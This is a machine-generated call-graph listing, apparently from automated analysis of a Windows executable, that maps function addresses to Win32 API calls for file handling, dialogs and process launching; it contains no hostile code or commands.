23620 4d9a79 23620->23616 23621 4d9a7d CreateFileW GetLastError 23620->23621 23622 4d9aa1 23621->23622 23622->23616 23623->23582 23624->23591 23626 4d9e64 SetFilePointer 23625->23626 23627 4d9e53 23625->23627 23628 4d9e9d 23626->23628 23629 4d9e82 GetLastError 23626->23629 23627->23628 23670 4d6fa5 75 API calls 23627->23670 23628->23591 23629->23628 23631 4d9e8c 23629->23631 23631->23628 23671 4d6fa5 75 API calls 23631->23671 23634 4d9677 23633->23634 23639 4d9688 23633->23639 23635 4d968a 23634->23635 23636 4d9683 23634->23636 23634->23639 23677 4d96d0 23635->23677 23672 4d9817 23636->23672 23639->23455 23642 4d9bfc 23640->23642 23644 4d9c03 23640->23644 23642->23591 23643 4d9c9e 23643->23642 23704 4d6f6b 75 API calls 23643->23704 23644->23642 23644->23643 23646 4d9cc0 23644->23646 23692 4d984e 23644->23692 23646->23642 23647 4d984e 5 API calls 23646->23647 23647->23646 23648->23591 23649->23588 23650->23607 23651->23602 23652->23603 23653->23594 23654->23607 23655->23607 23656->23599 23658 4db679 23657->23658 23666 4db683 23658->23666 23667 4db806 CharUpperW 23658->23667 23660 4db692 23668 4db832 CharUpperW 23660->23668 23662 4db6a1 23663 4db71c GetCurrentDirectoryW 23662->23663 23664 4db6a5 23662->23664 23663->23666 23669 4db806 CharUpperW 23664->23669 23666->23620 23667->23660 23668->23662 23669->23666 23670->23626 23671->23628 23673 4d9824 23672->23673 23674 4d9820 23672->23674 23673->23674 23683 4da12d 23673->23683 23674->23639 23679 4d96fa 23677->23679 23680 4d96dc 23677->23680 23678 4d9719 23678->23639 23679->23678 23691 4d6e3e 74 API calls 23679->23691 23680->23679 23681 4d96e8 CloseHandle 23680->23681 23681->23679 23684 4ee360 23683->23684 23685 4da13a DeleteFileW 23684->23685 23686 4da14d 23685->23686 23687 4d984c 23685->23687 23688 4db66c 2 API calls 23686->23688 23687->23639 23689 4da161 23688->23689 23689->23687 23690 4da165 DeleteFileW 23689->23690 23690->23687 23691->23678 23693 4d985c GetStdHandle 23692->23693 23694 4d9867 ReadFile 23692->23694 
23693->23694 23695 4d9880 23694->23695 23701 4d98a0 23694->23701 23705 4d9989 23695->23705 23697 4d9887 23698 4d98a8 GetLastError 23697->23698 23699 4d98b7 23697->23699 23700 4d9895 23697->23700 23698->23699 23698->23701 23699->23701 23703 4d98c7 GetLastError 23699->23703 23702 4d984e GetFileType 23700->23702 23701->23644 23702->23701 23703->23700 23703->23701 23704->23642 23706 4d998f 23705->23706 23707 4d9992 GetFileType 23705->23707 23706->23697 23708 4d99a0 23707->23708 23708->23697 23714 4ee24f ___std_exception_copy 23709->23714 23710 4e8854 23710->23029 23714->23710 23715 4f71ad 7 API calls 2 library calls 23714->23715 23716 4eecce RaiseException __CxxThrowException@8 new 23714->23716 23717 4eecb1 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 23714->23717 23715->23714 23719 4f7430 _unexpected 23718->23719 23720 4f7448 23719->23720 23721 4f757e _abort GetModuleHandleW 23719->23721 23740 4fa3f1 EnterCriticalSection 23720->23740 23723 4f743c 23721->23723 23723->23720 23752 4f75c2 GetModuleHandleExW 23723->23752 23724 4f74ee 23741 4f752e 23724->23741 23728 4f74c5 23731 4f74dd 23728->23731 23735 4f81f1 _abort 5 API calls 23728->23735 23729 4f750b 23744 4f753d 23729->23744 23730 4f7537 23761 501a19 5 API calls _ValidateLocalCookies 23730->23761 23736 4f81f1 _abort 5 API calls 23731->23736 23735->23731 23736->23724 23737 4f7450 23737->23724 23737->23728 23760 4f7f30 20 API calls _abort 23737->23760 23740->23737 23762 4fa441 LeaveCriticalSection 23741->23762 23743 4f7507 23743->23729 23743->23730 23763 4fa836 23744->23763 23747 4f756b 23749 4f75c2 _abort 8 API calls 23747->23749 23748 4f754b GetPEB 23748->23747 23750 4f755b GetCurrentProcess TerminateProcess 23748->23750 23751 4f7573 ExitProcess 23749->23751 23750->23747 23753 4f760f 23752->23753 23754 4f75ec GetProcAddress 23752->23754 23755 4f761e 23753->23755 23756 4f7615 FreeLibrary 23753->23756 23757 4f7601 23754->23757 23758 4eec4a _ValidateLocalCookies 5 API calls 23755->23758 
23756->23755 23757->23753 23759 4f7628 23758->23759 23759->23720 23760->23728 23762->23743 23764 4fa85b 23763->23764 23768 4fa851 23763->23768 23765 4fa458 _unexpected 5 API calls 23764->23765 23765->23768 23766 4eec4a _ValidateLocalCookies 5 API calls 23767 4f7547 23766->23767 23767->23747 23767->23748 23768->23766 24782 4eacd0 100 API calls 24834 4e19d0 26 API calls std::bad_exception::bad_exception 23776 4eaee0 23777 4eaeea __EH_prolog 23776->23777 23939 4d130b 23777->23939 23780 4eaf2c 23784 4eaf39 23780->23784 23785 4eafa2 23780->23785 23841 4eaf18 23780->23841 23781 4eb5cb 24004 4ecd2e 23781->24004 23789 4eaf3e 23784->23789 23790 4eaf75 23784->23790 23788 4eb041 GetDlgItemTextW 23785->23788 23794 4eafbc 23785->23794 23786 4eb5e9 SendMessageW 23787 4eb5f7 23786->23787 23792 4eb600 SendDlgItemMessageW 23787->23792 23793 4eb611 GetDlgItem SendMessageW 23787->23793 23788->23790 23791 4eb077 23788->23791 23795 4dddd1 53 API calls 23789->23795 23789->23841 23796 4eaf96 KiUserCallbackDispatcher 23790->23796 23790->23841 23797 4eb08f GetDlgItem 23791->23797 23937 4eb080 23791->23937 23792->23793 24022 4e9da4 GetCurrentDirectoryW 23793->24022 23799 4dddd1 53 API calls 23794->23799 23800 4eaf58 23795->23800 23796->23841 23802 4eb0a4 SendMessageW SendMessageW 23797->23802 23803 4eb0c5 SetFocus 23797->23803 23804 4eafde SetDlgItemTextW 23799->23804 24044 4d1241 SHGetMalloc 23800->24044 23801 4eb641 GetDlgItem 23806 4eb65e 23801->23806 23807 4eb664 SetWindowTextW 23801->23807 23802->23803 23808 4eb0d5 23803->23808 23822 4eb0ed 23803->23822 23809 4eafec 23804->23809 23806->23807 24023 4ea2c7 GetClassNameW 23807->24023 23813 4dddd1 53 API calls 23808->23813 23814 4eaff9 GetMessageW 23809->23814 23809->23841 23810 4eaf5f 23816 4eaf63 SetDlgItemTextW 23810->23816 23810->23841 23811 4eb56b 23817 4dddd1 53 API calls 23811->23817 23815 4eb0df 23813->23815 23820 4eb010 IsDialogMessageW 23814->23820 23814->23841 24045 4ecb5a 23815->24045 23816->23841 23823 4eb57b SetDlgItemTextW 
23817->23823 23820->23809 23825 4eb01f TranslateMessage DispatchMessageW 23820->23825 23827 4dddd1 53 API calls 23822->23827 23826 4eb58f 23823->23826 23825->23809 23830 4dddd1 53 API calls 23826->23830 23829 4eb124 23827->23829 23828 4eb6af 23833 4eb6df 23828->23833 23838 4dddd1 53 API calls 23828->23838 23834 4d400a _swprintf 51 API calls 23829->23834 23835 4eb5b8 23830->23835 23832 4ebdf5 98 API calls 23832->23828 23847 4ebdf5 98 API calls 23833->23847 23867 4eb797 23833->23867 23839 4eb136 23834->23839 23840 4dddd1 53 API calls 23835->23840 23836 4eb0e6 23949 4da04f 23836->23949 23845 4eb6c2 SetDlgItemTextW 23838->23845 23846 4ecb5a 16 API calls 23839->23846 23840->23841 23842 4eb847 23848 4eb859 23842->23848 23849 4eb850 EnableWindow 23842->23849 23843 4eb17f 23955 4ea322 SetCurrentDirectoryW 23843->23955 23844 4eb174 GetLastError 23844->23843 23851 4dddd1 53 API calls 23845->23851 23846->23836 23852 4eb6fa 23847->23852 23853 4eb876 23848->23853 24063 4d12c8 GetDlgItem EnableWindow 23848->24063 23849->23848 23855 4eb6d6 SetDlgItemTextW 23851->23855 23856 4eb70c 23852->23856 23876 4eb731 23852->23876 23861 4eb89d 23853->23861 23869 4eb895 SendMessageW 23853->23869 23854 4eb195 23859 4eb19e GetLastError 23854->23859 23860 4eb1ac 23854->23860 23855->23833 24061 4e9635 32 API calls 23856->24061 23857 4eb78a 23862 4ebdf5 98 API calls 23857->23862 23859->23860 23873 4eb237 23860->23873 23874 4eb1c4 GetTickCount 23860->23874 23915 4eb227 23860->23915 23861->23841 23865 4dddd1 53 API calls 23861->23865 23862->23867 23864 4eb86c 24064 4d12c8 GetDlgItem EnableWindow 23864->24064 23871 4eb8b6 SetDlgItemTextW 23865->23871 23866 4eb725 23866->23876 23867->23842 23870 4eb825 23867->23870 23883 4dddd1 53 API calls 23867->23883 23869->23861 24062 4e9635 32 API calls 23870->24062 23871->23841 23872 4eb46c 23964 4d12e6 GetDlgItem ShowWindow 23872->23964 23878 4eb24f GetModuleFileNameW 23873->23878 23879 4eb407 23873->23879 23880 4d400a _swprintf 51 API calls 23874->23880 
23876->23857 23884 4ebdf5 98 API calls 23876->23884 24055 4deb3a 80 API calls 23878->24055 23879->23790 23887 4dddd1 53 API calls 23879->23887 23881 4eb1dd 23880->23881 23956 4d971e 23881->23956 23882 4eb844 23882->23842 23883->23867 23888 4eb75f 23884->23888 23885 4eb47c 23965 4d12e6 GetDlgItem ShowWindow 23885->23965 23892 4eb41b 23887->23892 23888->23857 23893 4eb768 DialogBoxParamW 23888->23893 23890 4eb275 23891 4d400a _swprintf 51 API calls 23890->23891 23896 4eb297 CreateFileMappingW 23891->23896 23897 4d400a _swprintf 51 API calls 23892->23897 23893->23790 23893->23857 23894 4eb486 23895 4dddd1 53 API calls 23894->23895 23899 4eb490 SetDlgItemTextW 23895->23899 23900 4eb2f9 GetCommandLineW 23896->23900 23933 4eb376 __vswprintf_c_l 23896->23933 23901 4eb439 23897->23901 23966 4d12e6 GetDlgItem ShowWindow 23899->23966 23905 4eb30a 23900->23905 23914 4dddd1 53 API calls 23901->23914 23902 4eb203 23906 4eb20a GetLastError 23902->23906 23907 4eb215 23902->23907 23903 4eb381 ShellExecuteExW 23928 4eb39e 23903->23928 24056 4eab2e SHGetMalloc 23905->24056 23906->23907 23910 4d9653 79 API calls 23907->23910 23908 4eb4a2 SetDlgItemTextW GetDlgItem 23911 4eb4bf GetWindowLongW SetWindowLongW 23908->23911 23912 4eb4d7 23908->23912 23910->23915 23911->23912 23967 4ebdf5 23912->23967 23913 4eb326 24057 4eab2e SHGetMalloc 23913->24057 23914->23790 23915->23872 23915->23873 23919 4eb332 24058 4eab2e SHGetMalloc 23919->24058 23920 4eb3e1 23920->23879 23927 4eb3f7 UnmapViewOfFile CloseHandle 23920->23927 23921 4ebdf5 98 API calls 23923 4eb4f3 23921->23923 23992 4ed0f5 23923->23992 23924 4eb33e 24059 4decad 80 API calls ___scrt_fastfail 23924->24059 23927->23879 23928->23920 23931 4eb3cd Sleep 23928->23931 23930 4eb355 MapViewOfFile 23930->23933 23931->23920 23931->23928 23932 4ebdf5 98 API calls 23936 4eb519 23932->23936 23933->23903 23934 4eb542 24060 4d12c8 GetDlgItem EnableWindow 23934->24060 23936->23934 23938 4ebdf5 98 API calls 23936->23938 23937->23790 23937->23811 
23938->23934 23940 4d136d 23939->23940 23941 4d1314 23939->23941 24066 4dda71 GetWindowLongW SetWindowLongW 23940->24066 23942 4d137a 23941->23942 24065 4dda98 62 API calls 2 library calls 23941->24065 23942->23780 23942->23781 23942->23841 23945 4d1336 23945->23942 23946 4d1349 GetDlgItem 23945->23946 23946->23942 23947 4d1359 23946->23947 23947->23942 23948 4d135f SetWindowTextW 23947->23948 23948->23942 23951 4da059 23949->23951 23950 4da0ea 23952 4da207 9 API calls 23950->23952 23954 4da113 23950->23954 23951->23950 23951->23954 24067 4da207 23951->24067 23952->23954 23954->23843 23954->23844 23955->23854 23957 4d9728 23956->23957 23958 4d9792 CreateFileW 23957->23958 23959 4d9786 23957->23959 23958->23959 23960 4db66c 2 API calls 23959->23960 23961 4d97e4 23959->23961 23962 4d97cb 23960->23962 23961->23902 23962->23961 23963 4d97cf CreateFileW 23962->23963 23963->23961 23964->23885 23965->23894 23966->23908 23968 4ebdff __EH_prolog 23967->23968 23969 4eb4e5 23968->23969 24099 4eaa36 23968->24099 23969->23921 23972 4eaa36 ExpandEnvironmentStringsW 23981 4ebe36 _wcsrchr 23972->23981 23973 4ec11d SetWindowTextW 23973->23981 23978 4ebf0b SetFileAttributesW 23979 4ebfc5 GetFileAttributesW 23978->23979 23991 4ebf25 ___scrt_fastfail 23978->23991 23979->23981 23982 4ebfd7 DeleteFileW 23979->23982 23981->23969 23981->23972 23981->23973 23981->23978 23984 4ec2e7 GetDlgItem SetWindowTextW SendMessageW 23981->23984 23987 4ec327 SendMessageW 23981->23987 24103 4e17ac CompareStringW 23981->24103 24104 4e9da4 GetCurrentDirectoryW 23981->24104 24106 4da52a 7 API calls 23981->24106 24107 4da4b3 FindClose 23981->24107 24108 4eab9a 76 API calls ___std_exception_copy 23981->24108 24109 4f35de 23981->24109 23982->23981 23985 4ebfe8 23982->23985 23984->23981 23986 4d400a _swprintf 51 API calls 23985->23986 23988 4ec008 GetFileAttributesW 23986->23988 23987->23981 23988->23985 23989 4ec01d MoveFileW 23988->23989 23989->23981 23990 4ec035 MoveFileExW 23989->23990 23990->23981 
23991->23979 23991->23981 24105 4db4f7 52 API calls 2 library calls 23991->24105 23993 4ed0ff __EH_prolog 23992->23993 24124 4dfead 23993->24124 23995 4ed130 24128 4d5c59 23995->24128 23997 4ed14e 24132 4d7c68 23997->24132 24001 4ed1a1 24149 4d7cfb 24001->24149 24003 4eb504 24003->23932 24005 4ecd38 24004->24005 24006 4e9d1a 4 API calls 24005->24006 24007 4ecd3d 24006->24007 24008 4ecd45 GetWindow 24007->24008 24009 4eb5d1 24007->24009 24008->24009 24012 4ecd65 24008->24012 24009->23786 24009->23787 24010 4ecd72 GetClassNameW 24593 4e17ac CompareStringW 24010->24593 24012->24009 24012->24010 24013 4ecdfa GetWindow 24012->24013 24014 4ecd96 GetWindowLongW 24012->24014 24013->24009 24013->24012 24014->24013 24015 4ecda6 SendMessageW 24014->24015 24015->24013 24016 4ecdbc GetObjectW 24015->24016 24594 4e9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24016->24594 24018 4ecdd3 24595 4e9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24018->24595 24596 4e9f5d 8 API calls ___scrt_fastfail 24018->24596 24021 4ecde4 SendMessageW DeleteObject 24021->24013 24022->23801 24024 4ea2e8 24023->24024 24030 4ea30d 24023->24030 24597 4e17ac CompareStringW 24024->24597 24026 4ea31b 24031 4ea7c3 24026->24031 24027 4ea312 SHAutoComplete 24027->24026 24028 4ea2fb 24029 4ea2ff FindWindowExW 24028->24029 24028->24030 24029->24030 24030->24026 24030->24027 24032 4ea7cd __EH_prolog 24031->24032 24033 4d1380 82 API calls 24032->24033 24034 4ea7ef 24033->24034 24598 4d1f4f 24034->24598 24037 4ea818 24040 4d1951 126 API calls 24037->24040 24038 4ea809 24039 4d1631 84 API calls 24038->24039 24041 4ea814 24039->24041 24043 4ea83a __vswprintf_c_l ___std_exception_copy 24040->24043 24041->23828 24041->23832 24042 4d1631 84 API calls 24042->24041 24043->24041 24043->24042 24044->23810 24606 4eac74 PeekMessageW 24045->24606 24048 4ecbbc SendMessageW SendMessageW 24050 4ecbf8 24048->24050 24051 4ecc17 SendMessageW SendMessageW SendMessageW 24048->24051 24049 4ecb88 24052 4ecb93 ShowWindow 
SendMessageW SendMessageW 24049->24052 24050->24051 24053 4ecc6d SendMessageW 24051->24053 24054 4ecc4a SendMessageW 24051->24054 24052->24048 24053->23836 24054->24053 24055->23890 24056->23913 24057->23919 24058->23924 24059->23930 24060->23937 24061->23866 24062->23882 24063->23864 24064->23853 24065->23945 24066->23942 24068 4da214 24067->24068 24069 4da238 24068->24069 24070 4da22b CreateDirectoryW 24068->24070 24088 4da180 24069->24088 24070->24069 24072 4da26b 24070->24072 24076 4da27a 24072->24076 24080 4da444 24072->24080 24074 4da27e GetLastError 24074->24076 24076->23951 24077 4db66c 2 API calls 24078 4da254 24077->24078 24078->24074 24079 4da258 CreateDirectoryW 24078->24079 24079->24072 24079->24074 24081 4ee360 24080->24081 24082 4da451 SetFileAttributesW 24081->24082 24083 4da494 24082->24083 24084 4da467 24082->24084 24083->24076 24085 4db66c 2 API calls 24084->24085 24086 4da47b 24085->24086 24086->24083 24087 4da47f SetFileAttributesW 24086->24087 24087->24083 24091 4da194 24088->24091 24092 4ee360 24091->24092 24093 4da1a1 GetFileAttributesW 24092->24093 24094 4da189 24093->24094 24095 4da1b2 24093->24095 24094->24074 24094->24077 24096 4db66c 2 API calls 24095->24096 24097 4da1c6 24096->24097 24097->24094 24098 4da1ca GetFileAttributesW 24097->24098 24098->24094 24101 4eaa40 24099->24101 24100 4eab16 24100->23981 24101->24100 24102 4eaaf3 ExpandEnvironmentStringsW 24101->24102 24102->24100 24103->23981 24104->23981 24105->23991 24106->23981 24107->23981 24108->23981 24110 4f8606 24109->24110 24111 4f861e 24110->24111 24112 4f8613 24110->24112 24114 4f8626 24111->24114 24120 4f862f _unexpected 24111->24120 24113 4f8518 __onexit 21 API calls 24112->24113 24118 4f861b 24113->24118 24115 4f84de _free 20 API calls 24114->24115 24115->24118 24116 4f8659 HeapReAlloc 24116->24118 24116->24120 24117 4f8634 24122 4f895a 20 API calls _free 24117->24122 24118->23981 24120->24116 24120->24117 24123 4f71ad 7 API calls 2 library calls 24120->24123 24122->24118 
24123->24120 24125 4dfeba 24124->24125 24153 4d1789 24125->24153 24127 4dfed2 24127->23995 24129 4dfead 24128->24129 24130 4d1789 76 API calls 24129->24130 24131 4dfed2 24130->24131 24131->23997 24133 4d7c72 __EH_prolog 24132->24133 24170 4dc827 24133->24170 24135 4d7c8d 24136 4ee24a new 8 API calls 24135->24136 24137 4d7cb7 24136->24137 24176 4e440b 24137->24176 24140 4d7ddf 24141 4d7de9 24140->24141 24142 4d7e53 24141->24142 24205 4da4c6 24141->24205 24146 4d7ec4 24142->24146 24148 4da4c6 8 API calls 24142->24148 24183 4d837f 24142->24183 24144 4d7f06 24144->24001 24146->24144 24211 4d6dc1 74 API calls 24146->24211 24148->24142 24150 4d7d09 24149->24150 24152 4d7d10 24149->24152 24151 4e1acf 84 API calls 24150->24151 24151->24152 24154 4d179f 24153->24154 24165 4d17fa __vswprintf_c_l 24153->24165 24155 4d17c8 24154->24155 24166 4d6e91 74 API calls __vswprintf_c_l 24154->24166 24157 4d1827 24155->24157 24162 4d17e7 ___std_exception_copy 24155->24162 24159 4f35de 22 API calls 24157->24159 24158 4d17be 24167 4d6efd 75 API calls 24158->24167 24161 4d182e 24159->24161 24161->24165 24169 4d6efd 75 API calls 24161->24169 24162->24165 24168 4d6efd 75 API calls 24162->24168 24165->24127 24166->24158 24167->24155 24168->24165 24169->24165 24171 4dc831 __EH_prolog 24170->24171 24172 4ee24a new 8 API calls 24171->24172 24173 4dc874 24172->24173 24174 4ee24a new 8 API calls 24173->24174 24175 4dc898 24174->24175 24175->24135 24177 4e4415 __EH_prolog 24176->24177 24178 4ee24a new 8 API calls 24177->24178 24179 4e4431 24178->24179 24180 4d7ce6 24179->24180 24182 4e06ba 78 API calls 24179->24182 24180->24140 24182->24180 24184 4d8389 __EH_prolog 24183->24184 24212 4d1380 24184->24212 24186 4d83a4 24220 4d9ef7 24186->24220 24192 4d83d3 24343 4d1631 24192->24343 24193 4d846e 24239 4d8517 24193->24239 24196 4d84ce 24246 4d1f00 24196->24246 24200 4d83cf 24200->24192 24200->24193 24203 4da4c6 8 API calls 24200->24203 24347 4dbac4 CompareStringW 24200->24347 24201 4d84d9 24201->24192 
24250 4d3aac 24201->24250 24260 4d857b 24201->24260 24203->24200 24206 4da4db 24205->24206 24210 4da4df 24206->24210 24581 4da5f4 24206->24581 24208 4da4ef 24209 4da4f4 FindClose 24208->24209 24208->24210 24209->24210 24210->24141 24211->24144 24213 4d1385 __EH_prolog 24212->24213 24214 4dc827 8 API calls 24213->24214 24215 4d13bd 24214->24215 24216 4ee24a new 8 API calls 24215->24216 24219 4d1416 ___scrt_fastfail 24215->24219 24217 4d1403 24216->24217 24218 4db07d 82 API calls 24217->24218 24217->24219 24218->24219 24219->24186 24221 4d9f0e 24220->24221 24222 4d83ba 24221->24222 24348 4d6f5d 76 API calls 24221->24348 24222->24192 24224 4d19a6 24222->24224 24225 4d19b0 __EH_prolog 24224->24225 24235 4d1a00 24225->24235 24238 4d19e5 24225->24238 24349 4d709d 24225->24349 24227 4d1b50 24352 4d6dc1 74 API calls 24227->24352 24229 4d3aac 97 API calls 24232 4d1bb3 24229->24232 24230 4d1b60 24230->24229 24230->24238 24231 4d1bff 24237 4d1c32 24231->24237 24231->24238 24353 4d6dc1 74 API calls 24231->24353 24232->24231 24234 4d3aac 97 API calls 24232->24234 24234->24232 24235->24227 24235->24230 24235->24238 24236 4d3aac 97 API calls 24236->24237 24237->24236 24237->24238 24238->24200 24240 4d8524 24239->24240 24371 4e0c26 GetSystemTime SystemTimeToFileTime 24240->24371 24242 4d8488 24242->24196 24243 4e1359 24242->24243 24373 4ed51a 24243->24373 24247 4d1f05 __EH_prolog 24246->24247 24248 4d1f39 24247->24248 24381 4d1951 24247->24381 24248->24201 24251 4d3abc 24250->24251 24252 4d3ab8 24250->24252 24253 4d3af7 24251->24253 24255 4d3ae9 24251->24255 24252->24201 24516 4d27e8 97 API calls 3 library calls 24253->24516 24254 4d3b29 24254->24201 24255->24254 24515 4d3281 85 API calls 3 library calls 24255->24515 24258 4d3af5 24258->24254 24517 4d204e 74 API calls 24258->24517 24261 4d8585 __EH_prolog 24260->24261 24262 4d85be 24261->24262 24270 4d85c2 24261->24270 24539 4e84bd 99 API calls 24261->24539 24263 4d85e7 24262->24263 24268 4d867a 24262->24268 24262->24270 24265 
4d8609 24263->24265 24263->24270 24540 4d7b66 151 API calls 24263->24540 24265->24270 24541 4e84bd 99 API calls 24265->24541 24268->24270 24518 4d5e3a 24268->24518 24270->24201 24271 4d8705 24271->24270 24524 4d826a 24271->24524 24274 4d8875 24275 4da4c6 8 API calls 24274->24275 24277 4d88e0 24274->24277 24275->24277 24276 4dc991 80 API calls 24282 4d893b _memcmp 24276->24282 24528 4d7d6c 24277->24528 24279 4d8a70 24280 4d8b43 24279->24280 24286 4d8abf 24279->24286 24285 4d8b9e 24280->24285 24295 4d8b4e 24280->24295 24281 4d8a69 24544 4d1f94 74 API calls 24281->24544 24282->24270 24282->24276 24282->24279 24282->24281 24542 4d8236 82 API calls 24282->24542 24543 4d1f94 74 API calls 24282->24543 24294 4d8b30 24285->24294 24547 4d80ea 96 API calls 24285->24547 24288 4da180 4 API calls 24286->24288 24286->24294 24287 4d8b9c 24289 4d9653 79 API calls 24287->24289 24292 4d8af7 24288->24292 24289->24270 24291 4d9653 79 API calls 24291->24270 24292->24294 24545 4d9377 96 API calls 24292->24545 24293 4d8c09 24297 4d9989 GetFileType 24293->24297 24306 4d8c74 24293->24306 24342 4d91c1 __except_handler4 24293->24342 24294->24287 24294->24293 24295->24287 24546 4d7f26 100 API calls __except_handler4 24295->24546 24296 4daa88 8 API calls 24299 4d8cc3 24296->24299 24301 4d8c4c 24297->24301 24302 4daa88 8 API calls 24299->24302 24301->24306 24548 4d1f94 74 API calls 24301->24548 24315 4d8cd9 24302->24315 24304 4d8c62 24549 4d7061 75 API calls 24304->24549 24306->24296 24307 4d8d9c 24308 4d8efd 24307->24308 24309 4d8df7 24307->24309 24313 4d8f0f 24308->24313 24314 4d8f23 24308->24314 24330 4d8e27 24308->24330 24310 4d8e69 24309->24310 24312 4d8e07 24309->24312 24311 4d826a CharUpperW 24310->24311 24316 4d8e84 24311->24316 24317 4d8e4d 24312->24317 24323 4d8e15 24312->24323 24318 4d92e6 121 API calls 24313->24318 24319 4e2c42 75 API calls 24314->24319 24315->24307 24550 4d9b21 SetFilePointer GetLastError SetEndOfFile 24315->24550 24325 4d8ead 24316->24325 24326 4d8eb4 24316->24326 
24316->24330 24317->24330 24552 4d7907 108 API calls 24317->24552 24318->24330 24321 4d8f3c 24319->24321 24555 4e28f1 121 API calls 24321->24555 24551 4d1f94 74 API calls 24323->24551 24553 4d7698 84 API calls __except_handler4 24325->24553 24554 4d9224 94 API calls __EH_prolog 24326->24554 24335 4d904b 24330->24335 24556 4d1f94 74 API calls 24330->24556 24332 4d9156 24334 4da444 4 API calls 24332->24334 24332->24342 24333 4d9104 24534 4d9d62 24333->24534 24336 4d91b1 24334->24336 24335->24332 24335->24333 24335->24342 24557 4d9ebf SetEndOfFile 24335->24557 24336->24342 24558 4d1f94 74 API calls 24336->24558 24339 4d914b 24341 4d96d0 75 API calls 24339->24341 24341->24332 24342->24291 24344 4d1643 24343->24344 24573 4dc8ca 24344->24573 24347->24200 24348->24222 24354 4d16d2 24349->24354 24351 4d70b9 24351->24235 24352->24238 24353->24237 24355 4d16e8 24354->24355 24366 4d1740 __vswprintf_c_l 24354->24366 24356 4d1711 24355->24356 24367 4d6e91 74 API calls __vswprintf_c_l 24355->24367 24357 4d1767 24356->24357 24363 4d172d ___std_exception_copy 24356->24363 24360 4f35de 22 API calls 24357->24360 24359 4d1707 24368 4d6efd 75 API calls 24359->24368 24361 4d176e 24360->24361 24361->24366 24370 4d6efd 75 API calls 24361->24370 24363->24366 24369 4d6efd 75 API calls 24363->24369 24366->24351 24367->24359 24368->24356 24369->24366 24370->24366 24372 4e0c56 __vsnwprintf_l 24371->24372 24372->24242 24374 4ed527 24373->24374 24375 4dddd1 53 API calls 24374->24375 24376 4ed54a 24375->24376 24377 4d400a _swprintf 51 API calls 24376->24377 24378 4ed55c 24377->24378 24379 4ecb5a 16 API calls 24378->24379 24380 4e1372 24379->24380 24380->24196 24382 4d195d 24381->24382 24383 4d1961 24381->24383 24382->24248 24385 4d1896 24383->24385 24386 4d18a8 24385->24386 24387 4d18e5 24385->24387 24388 4d3aac 97 API calls 24386->24388 24393 4d3f18 24387->24393 24391 4d18c8 24388->24391 24391->24382 24397 4d3f21 24393->24397 24394 4d3aac 97 API calls 24394->24397 24395 4d1906 24395->24391 
24398 4d1e00 24395->24398 24397->24394 24397->24395 24410 4e067c 24397->24410 24399 4d1e0a __EH_prolog 24398->24399 24418 4d3b3d 24399->24418 24401 4d1e34 24402 4d1ebb 24401->24402 24403 4d16d2 76 API calls 24401->24403 24402->24391 24404 4d1e4b 24403->24404 24446 4d1849 76 API calls 24404->24446 24406 4d1e63 24408 4d1e6f 24406->24408 24447 4e137a MultiByteToWideChar 24406->24447 24448 4d1849 76 API calls 24408->24448 24411 4e0683 24410->24411 24414 4e069e 24411->24414 24416 4d6e8c RaiseException __CxxThrowException@8 24411->24416 24413 4e06af SetThreadExecutionState 24413->24397 24414->24413 24417 4d6e8c RaiseException __CxxThrowException@8 24414->24417 24416->24414 24417->24413 24419 4d3b47 __EH_prolog 24418->24419 24420 4d3b5d 24419->24420 24421 4d3b79 24419->24421 24477 4d6dc1 74 API calls 24420->24477 24423 4d3dc2 24421->24423 24426 4d3ba5 24421->24426 24494 4d6dc1 74 API calls 24423->24494 24425 4d3b68 24425->24401 24426->24425 24449 4e2c42 24426->24449 24428 4d3c26 24429 4d3cb1 24428->24429 24445 4d3c1d 24428->24445 24480 4dc991 24428->24480 24462 4daa88 24429->24462 24430 4d3c22 24430->24428 24479 4d2034 76 API calls 24430->24479 24432 4d3bf4 24432->24428 24432->24430 24433 4d3c12 24432->24433 24478 4d6dc1 74 API calls 24433->24478 24436 4d3cc4 24439 4d3d3e 24436->24439 24440 4d3d48 24436->24440 24466 4d92e6 24439->24466 24486 4e28f1 121 API calls 24440->24486 24443 4d3d46 24443->24445 24487 4d1f94 74 API calls 24443->24487 24488 4e1acf 24445->24488 24446->24406 24447->24408 24448->24402 24450 4e2c51 24449->24450 24452 4e2c5b 24449->24452 24495 4d6efd 75 API calls 24450->24495 24453 4e2ca2 ___std_exception_copy 24452->24453 24456 4e2c9d Concurrency::cancel_current_task 24452->24456 24461 4e2cfd ___scrt_fastfail 24452->24461 24454 4e2da9 Concurrency::cancel_current_task 24453->24454 24455 4e2cd9 24453->24455 24453->24461 24498 4f157a RaiseException 24454->24498 24496 4e2b7b 75 API calls 4 library calls 24455->24496 24497 4f157a RaiseException 24456->24497 
24460 4e2dc1 24461->24432 24463 4daa95 24462->24463 24465 4daa9f 24462->24465 24464 4ee24a new 8 API calls 24463->24464 24464->24465 24465->24436 24467 4d92f0 __EH_prolog 24466->24467 24499 4d7dc6 24467->24499 24470 4d709d 76 API calls 24471 4d9302 24470->24471 24502 4dca6c 24471->24502 24473 4d935c 24473->24443 24475 4dca6c 114 API calls 24476 4d9314 24475->24476 24476->24473 24476->24475 24511 4dcc51 97 API calls __vswprintf_c_l 24476->24511 24477->24425 24478->24445 24479->24428 24481 4dc9c4 24480->24481 24482 4dc9b2 24480->24482 24513 4d6249 80 API calls 24481->24513 24512 4d6249 80 API calls 24482->24512 24485 4dc9bc 24485->24429 24486->24443 24487->24445 24489 4e1ad9 24488->24489 24490 4e1af2 24489->24490 24493 4e1b06 24489->24493 24514 4e075b 84 API calls 24490->24514 24492 4e1af9 24492->24493 24494->24425 24495->24452 24496->24461 24497->24454 24498->24460 24500 4dacf5 GetVersionExW 24499->24500 24501 4d7dcb 24500->24501 24501->24470 24508 4dca82 __vswprintf_c_l 24502->24508 24503 4dcbf7 24504 4dcc1f 24503->24504 24505 4dca0b 6 API calls 24503->24505 24506 4e067c SetThreadExecutionState RaiseException 24504->24506 24505->24504 24509 4dcbee 24506->24509 24507 4e84bd 99 API calls 24507->24508 24508->24503 24508->24507 24508->24509 24510 4dab70 89 API calls 24508->24510 24509->24476 24510->24508 24511->24476 24512->24485 24513->24485 24514->24492 24515->24258 24516->24258 24517->24254 24519 4d5e4a 24518->24519 24559 4d5d67 24519->24559 24522 4d5e7d 24523 4d5eb5 24522->24523 24564 4dad65 CharUpperW CompareStringW 24522->24564 24523->24271 24525 4d8289 24524->24525 24570 